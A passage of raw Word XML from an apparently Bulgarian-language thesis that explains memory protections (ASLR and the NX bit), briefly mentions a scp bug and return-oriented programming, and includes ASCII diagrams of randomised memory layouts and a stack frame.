      <w:r w:rsidRPr="00112660">
        <w:t>Излишна зависимост - програми като системните инструменти са малки програми и би било излишно да се добавят зависимости, които не допринасят към инструмента. Недостатъкът е, че ако се открие уязвимост, то отново има проблем с обновяване. Такъв е случая с наскоро открития бъг в инструмента scp, описан от Хари Синтонен</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="15"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Той може да бъде открит във всички версии на програмата, излезли в последните 35 години.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_9o99j7xjqplw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="26" w:name="_Toc3540755"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Address space layout randomisation (ASLR)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00EA3DCB">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">ASLR използва факта, че на практика всички модерни компилатори поддържат генерирането на преместваем код, както и виртуалната памет </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:t xml:space="preserve">(описана в </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">т. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:instrText xml:space="preserve"> REF _Ref2190204 \r \h </w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> Това позволява на операционните системи всеки път да зареждат програми и споделени библиотеки на случайни места в паметта. Това прави експлоатацията на уязвим буфер изключително трудна и практически игра на хазарт, защото атакуващият трябва да избере адрес, към който атакуваната функция да върне.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">      run 1                    run 2                    run 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+---------------+        +---------------+        +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        |     text      |        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        |               |        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        +---------------+        +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        |               |        |     text      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        +---------------+        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        |     heap      |        +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+---------------+        |               |        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|     heap      |        +---------------+        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        |               |        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+---------------+        |               |        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|     stack     |        |               |        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        |               |        +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+---------------+        |               |        |     stack     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        +---------------+        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        |     stack     |        +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        |               |        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+---------------+        +---------------+        +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|     text      |        |               |        |     heap      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|               |        |               |        |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+---------------+        +---------------+        +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: Слуайно зареждане при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Това обаче също не е перфектно решение. В миналото са откривани слабости и в тази система, например през 2009</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="16"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">, които позволяват да бъдат прескочени. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Важно е да се отбележи, че всички адреси се разбъркват в началото на всеки процес, но ако разберем как са били оригинално заредени , можем да заобиколим защитата, защото няма повторно разбъркване.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_8bkjudx5fblb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="28" w:name="_Toc3540756"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Бит за </w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>забрана</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> на изпълнение (NX bit)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>При съвременните процесори паметта е разделена на страници, всяка от които има права, описани в таблицата на блока за управление на паметта, използван за</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> реализиране на виртуална памет</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00543FBF">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">описана </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">в т. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref2190204 \r \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> Едно от тях е правото за изпълнение, което не се дава на страници, в които няма код, например stack и data сегментите. Този флаг се определя от операционната система, а процесорът има хардуер, който следи неговото спазване. Така се елиминират buffer overflow атаки със зареждане на изпълним код отвън, защото при </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> инструкция до него се генерира хардуерно изключение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">На практика това само затруднява атакуващия и се използват заобиколни методи, като return oriented programming (ROP). На практика една програма има страшно много код, вече зареден в адресното пространство на процеса. Атакуващият може да подреди стека по такъв начин, че да бъдат изпълнени много </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>leave</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> инструкции (ефективно части от кадри), по такъв начин, че да се контролира пътят на изпълнение. Ако бъдат избрани такива адреси, които да сочат към инструкция в тялото на различни функции, изпускайки изграждане на нов кадър, те могат да се изпълнят и при изход да използват подправения кадър. Методът често се използва в комбинация с бъгове, които ни дават поглед върху адресите на процеса. Този подход е алтернативен на shellcode, но е много по-сложен от него и не е в обхвата на дипломната работа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_hw4xdllpyqv1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   params 0    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|  saved rip 0  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|  saved rbp 0  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    vars 0     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   params 1    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|  saved rip 1  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|  saved rbp 1  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    vars 1     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: примерен стек след </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
